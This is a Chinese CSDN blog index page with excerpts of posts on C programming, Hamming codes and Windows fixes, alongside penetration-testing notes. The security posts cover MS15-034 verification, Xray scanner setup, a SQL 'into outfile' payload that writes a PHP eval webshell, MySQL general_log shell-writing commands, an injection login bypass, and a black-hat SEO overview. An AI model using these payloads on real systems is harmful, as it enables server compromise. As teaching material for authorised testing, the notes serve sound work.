- 博客(29)
- 收藏
- 关注
RSS订阅
原创 汉明码的原理、生成和检验
在计算机运行过程中,由于种种原因导致数据在存储过程中可能出现差错,为了能够及时发现错误并且将错误纠正,通常可以将原数据配成汉明编码。汉明码具有一位纠错能力。设将要进行检测的二进制代码为n位,为使其具有纠错能力,需要再加上k位的检测位,组成n+k位的代码。那么,新增加的检测位数k应满足:2k≥n+k+1或2k-1≥n+k代码长度和检测位数的关系NK
2017-01-03 20:11:47
39585
13
原创 http.sys整数溢出漏洞(MS15-034)验证方法
漏洞成因:18446744073709551615转为十六进制即是 0xFFFFFFFFFFFFFFFF(16个F),是64位无符号整形所能表达的最大整数,这个“整数溢出”必然同这个异常的超大整数有关,若IIS服务器返回“416 Requested Range Not Satisfiable”,则是存在漏洞,若返回”The request has an invalid header name“,或其他状态码则说明漏洞已经修补。漏洞危害:利用该漏洞构造恶意的http请求数据包,可使服务器系统蓝屏崩
2021-01-23 11:41:17
3740
原创 Burpsuit结合xray使用
在浏览器代理的基础上,更方便的做法是使用burp的中转功能结合xray,这样扫描到的资源会更多。首先,进行burp的中转设置,如下图:然后启动xray,打开浏览器,将代理设置为burp的端口,如下图:访问目标网站,可以发现所有流量经burp后发送到xray进行扫描,大多数的加载项已经可以扫描,只剩下少数的需要主动触发的扫描需要人为干预。...
2021-01-23 11:02:28
1144
原创 浏览器代理结合Xray扫描
Xray是一个方便有用的漏洞扫描工具,综合了许多常见的poc和漏洞,怎样才能更好的使用xray去发现漏洞?最简单的方法是直接使用浏览器+xray,然后需要主动去触发网站的内容,这样才能进行扫描。首先,从GitHub下载xray,启动xray使用命令.\xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --html-output test.html具体的参数意义可以去xray的readme.md查询,一般我喜欢将上述命令写成.bat
2021-01-23 10:52:48
1482
原创 crawlergo.exe结合X-ray实现自动扫描
一般来说,使用X-ray扫描web漏洞就那几种方式,但是都需要人主动点击触发扫描这个过程,个人感觉不方便,最近发现github有人使用crawlergo.exe结合X-ray使用爬虫可以完全自动化扫描,可将扫描放到服务器上,然后等着收割漏洞。(附地址:https://github.com/timwhitez/crawlergo_x_XRAY)但是下载后发现除了说明中提到的权限不足拒绝访问的问题,如下图:出现拒绝访问的问题,按照说明文档的指引,删除crawlergo文件夹即可,但是还会出现系统找不
2021-01-23 00:50:25
1219
转载 nmap把端口定义为六种状态的解读
NMAP六种端口状态解读Nmap是一种用来发现网络中主机和服务的安全扫描工具,从而能够产生一个网络“地图”,为了完成这个功能,nmap会向每个目标主机发送特定的报文,从而从目标主机返回报文(或者无返回报文)来判断目标主机的属性(如:开放的端口,所使用的操作系统,操作系统的类型等信息)本文主要讨论nmap对端口进行扫描中,当nmap向目标主机发送报文并根据返回报文从而认定端口的6种...
2019-10-21 16:27:43
740
原创 渗透测试流程
1.信息收集主动收集通过访问目标地址,和相关地址或者通过扫描等方式收集信息;优点:收集到的信息比较多;缺点:可能会被记录自己的操作信息,导致打草惊蛇;被动收集通过第三方的服务来收集目标的相关信息;优点:基本上对方处于无感知状态;缺点:收集内容有限,速度较慢;一般情况下,最好先采用被动收集的方法去收集信息,然后采用主动收集去有目的的收集在被动收集过程中缺少的信息;需要收集的信息...
2019-04-19 15:49:21
3977
转载 黑帽SEO手法
0x00:概念SEO全称搜索引擎优化,通过站内优化和站内优化方式来提升搜索引擎排名,有白帽SEO和黑帽SEO。因为正规的SEO优化需要很长时间,黑帽SEO手法让站内快速提升排名的有: 黑链(暗链) 站群 网站劫持(搜索引擎劫持) 桥页 0x01:SEO的一些黑色手法常见的SEO手法: 利用泛解析做站群 入侵高权重网站挂暗链 ...
2019-04-03 10:06:32
2038
转载 Linux 查看日志命令
Linux日志分类、各个日志作用:last:列出当前和曾经登入系统的用户信息-R 显示从何处登入系统(不显示登入系统的主机名称或ip地址)-a 把从何处登入系统的主机名称或ip地址显示在最后一行-f <记录文件> 指定记录文件-n n是指列数 列出名单的显示列数-x 显示系统关机,重新开机,以及执行等级的改变等信息。查看所有重启、关机记录:last | grep...
2019-03-18 11:41:13
258
原创 sql语句利用into outfile写入一句话
利用需要的条件有:1、对web目录需要有写权限能够使用单引号2、知道绝对路径3、没有配置-secure-file-priv当知道路径时,可以直接用?id=1 union select "<?php @eval($_POST['123']);?>" into outfile("C:/phpStudy/WWW/a.php")或者采用PHPmyadmin,选择一个数据库如...
2019-03-04 15:32:44
6670
原创 利用general_log来getshell
设置了general_log和general_log_file之后所有SQL记录都会写入指定的文件使用show variables like '%general%'; //查询general_log的开启状态如图如果没有开启可以使用set global general_log=on;//将其打开。然后使用set global general_log_file='...
2019-03-04 15:27:04
819
转载 常见漏洞与分析
一、SQL注入(1)注入产生原理使用用户输入的参数拼凑SQL语句,用户对服务器端代码里的SQL语句可控,使服务器执行恶意的sql命令http://bbs.pconline.com.cn/topic.jsp?tid=1 ' and 1=2(2)万能密码select * from tb_name where name = ' ' or 1=1 - - ' and passwd = ' '(3)危害...
2018-07-15 14:54:23
4423
原创 AIT刚发现的小功能之快捷键
经常在网上浏览文章的人会看到类似这样的文章,史上最全常用快捷键之类的。其中方便的快捷键有很多,但是我们并不能完全的记忆下来,能背下的也就是常用的那么几个。刚刚无意间按到了Alt 发现你需要的快捷组合会显示出来,如图。微软的很实用的小功能,不清楚那个版本会有这个功能,我的是win10专业版...
2018-03-03 17:27:03
581
原创 使用word写博客
一直觉得csdn写博客的时候上传图片不太舒服,想着能用word写博客挺好。于是从百度上查了一下,果然中国的网友还是很强大的,下面介绍如何使用word连接博客。在百度经验上看的,好像office2007以上的完整版才有这个功能。在这里我的电脑用的13版的,如果需要07版的,我这里附上链接https://jingyan.baidu.com/article/8ebacdf0db266749f65cd
2018-03-03 17:14:37
759
原创 无线路由器桥接(以不同品牌为例tplink和fast)
一般上,TP-link的路由器要好于FAST的路由器,所以在这里我使用tplink作为主路由器。首先,我也在网上看了一些教程,什么把信道保持一致,DPCP服务关闭,我试了一下,不需要保持一致,dhcp不关闭也没见有啥。但是,如果想要更好的无线感受,可以把信道都换成11或者1。然后记下主路由器的lan口ip,把副路由器的lan口ip改成主路由器的子网ip,要不然桥接后会出现管理界面无
2018-01-29 22:53:41
10951
原创 硬盘根目录只能创建文件夹解决方法
以前的废电脑拆下来的机械硬盘做成了移动硬盘,然而发现根目录下只能创建文件夹,其他的东西没有,如下。然后找到不正常的盘上右键选属性,在属性框里选择安全,选中Everyone点下方的编辑,在弹出的框里“Everyone的权限”里把全部控制的勾勾上,应用并确认。如果硬盘里东西比较多的话可能权限设置时间会比较长,等权限设置完成后新建选项就正常了。
2018-01-05 20:21:07
4450
1
原创 win10下出现.net framework 3.5错误代码0x800F081F的问题
在帮别人装CAD的时候,出现了这个问题,一开始上百度查找解决方法,说的是从管理→服务→windows Update→属性,启动类型选成手动,然后启动。后来试了试,发现这个方法并不行,然后又在网站找大牛的解决方法,终于找到了方法。复制链接:http://download.windowsupdate.com/d/msdownload/update/software/updt/2015/11/mic...
2017-12-27 00:21:13
29149
6
原创 C语言continue和break的区别
break是结束整个循环体,continue是结束单次循环通过下面这个程序我们来直观的看一下break和continue的区别continue语句:#includeint main(){ int i; for(i=1;i<20;i++) { if(i%3==0) { printf("%d\n",i); continue; } printf("i==
2017-09-16 11:22:11
987
原创 C语言for循环语句的执行顺序
#includeint main(){ int i; for(i=0;i<5;i++) { printf("%d\n",i); } return 0;}执行数序是:1、i=0 初始化初值2.i执行循环体代码i++ 变量i自增回到第2步,一直循环下去,直到第2步为假, 退出循环.
2017-09-16 11:13:18
7354
1
原创 C语言switch的条件表达式要求
switch语句是多分支选择语句,一般当if嵌套过多的时候可以考虑使用。switch(表达式){case 常量1:语句1case .....:.....default:语句n}switch只针对基本数据类型使用,即switch后面括号内的表达式,其值得类型应为整数类型(包括字符型),也就是(int,char,枚举,bool),对于其他类型,应该考虑其他条件控制语句例如i
2017-09-16 10:12:17
14831
原创 C语言值传递与地址传递
在我们学习C语言函数部分的时候,书上写的实参向形参的数据传递是‘值传递’,是单向传递,只能由实参传递给形参,而不能由形参传递给实参。由于这个特性,我们可能在写程序时,有些函数内改变了一些值,运行结果会数值却没有发生变化。例如例一::当我们学习到指针部分时,会接触到‘地址传递’,会发现有一份类似函数部分的程序却可以改变主函数的参数的数值。这是因为存放的是由主调函数放进来的实参变量的地址。...
2017-09-05 21:57:32
1238
1
原创 C语言形参和实参
形式参数(形参):定义函数名和函数体时需要用的参数,目的是用来接收调用该函数时传递的参数。实际参数(实参):传递给被调用函数的值。通俗的来讲,形参就像物理计算中的公式中的符号,比如Ω,A,V等,而实参就是在计算中的实际的数值。调用过程就是实现形参与实参的结合,把实参的值通过调用传递给形参,相当于把具体的值代入公式进行计算。 形式参数(形参)实
2017-09-05 21:44:50
17120
3
原创 C语言全局变量与局部变量及存储方式
由于变量的作用域不同,我们将变量分为全局变量和局部变量。局部变量一般是在一个函数内有效,只能在本函数内引用,其他函数不可用。全局变量一般是在函数外定义的变量,我们叫做全局变量。即在函数内定义的是局部变量,在函数外定义的是全局变量。来看这个程序。#includeint main(){int x;void a();void b();x=10;a(x);b
2017-08-27 10:07:20
2080
原创 mysql#1045错误如何消除
渗透测试过程中,有时我们会需要用到wampserver等类似的工具在本地搭建环境进行渗透测试,然而有一些环境是可以自动安装的,但是需要数据库密码,phpmyadmin可以很方便的更改localhost和127.0.0.1的密码,当密码更改后,如果我们需要清楚的查看数据库中的表信息或者数据信息,我们会继续使用phpmyadmin,但是我们会发现phpmyadmin无法进入,出现如图片的错误。这个
2017-04-23 13:25:43
360
原创 windows下python2.7 pip的安装
本人的python版本是Python 2.7.12的,一般的python2.*应该都是可以按照这个方法的。首先下载pip的包,网址是https://pypi.python.org/pypi/pip下载好后将此文件放在python目录下,然后进行解压。进入pip-9.0.1这个文件夹,按住shift然后点击右键,选择在此处打开命令窗口,如下图:输入命令
2017-03-22 19:55:25
9992
原创 John介绍及常用命令使用说明
john是一款大受欢迎的、免费的开源软件、基于字典的密码破解工具。用于在已知密文的情况下尝试破解出明文的破解密码软件,支持目前大多数的加密算法,如DES、MD4、MD5等。John支持字典破解方式和暴力破解方式。它支持多种不同类型的系统架构,包括Unix、Linux、Windows、DOS模式、BeOS和OpenVMS,主要目的是破解不够牢固的Unix/Linux系统密码。在对john输入
2017-03-10 20:28:49
17249
原创 如何设置中断屏蔽字
对应每一个中断请求触发器就有一个屏蔽触发器,将所有的屏蔽触发器组合在一起,就成了一个屏蔽寄存器,屏蔽寄存器中的内容称为屏蔽字。在终端服务程序中设置合适的屏蔽字,能起到对优先级别不同的中断源的屏蔽作用。屏蔽技术是可以改变优先等级的。优先级包含响应优先级和处理优先级。响应优先级是CPU响应各中断源请求的优先次序,这种次序一般是硬件线路已经设置好的,不便改动。处理优先级是CPU实际对各中断源请求的处理优
2017-01-03 15:12:54
27454
13
原创 如何求原码、补码、反码、移码和他们的关系
8位二进制数整数无符号数的表示范围是:0~255整数原码的表示范围是:-127~+127整数补码的表示范围是:-128~+127整数反码的表示范围是:-127~+127当x=+1110, [x]原=0,1110正数符号位是0当x=-1110, [x]原=1,1110负数符号位是1当x=+1010,[x]补=0,1010正数补码是本身当x=-1101, [x]
2017-01-01 21:49:50
9637
原创 在不损失数据的情况下如何扩展C盘
电脑使用使用时间长了以后C盘的容量就有些不够用了,一开始百度了一些方法,说是在右键我的电脑,——>管理——>磁盘管理来进行扩容,在要缩小的分区点击右键压缩卷,输入大小,然后在C盘扩展卷相应的大小就可以,但是发现C盘无法采用这样的方法进行扩容,但是用来扩容其他的分区还是可以的。本人使用的方法是下载分区助手,按照这个软件帮助的方法是采用扩展分区向导发现也进行不下去最后发现采用如下方法可以使C盘
2016-12-02 19:17:17
2818
4
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人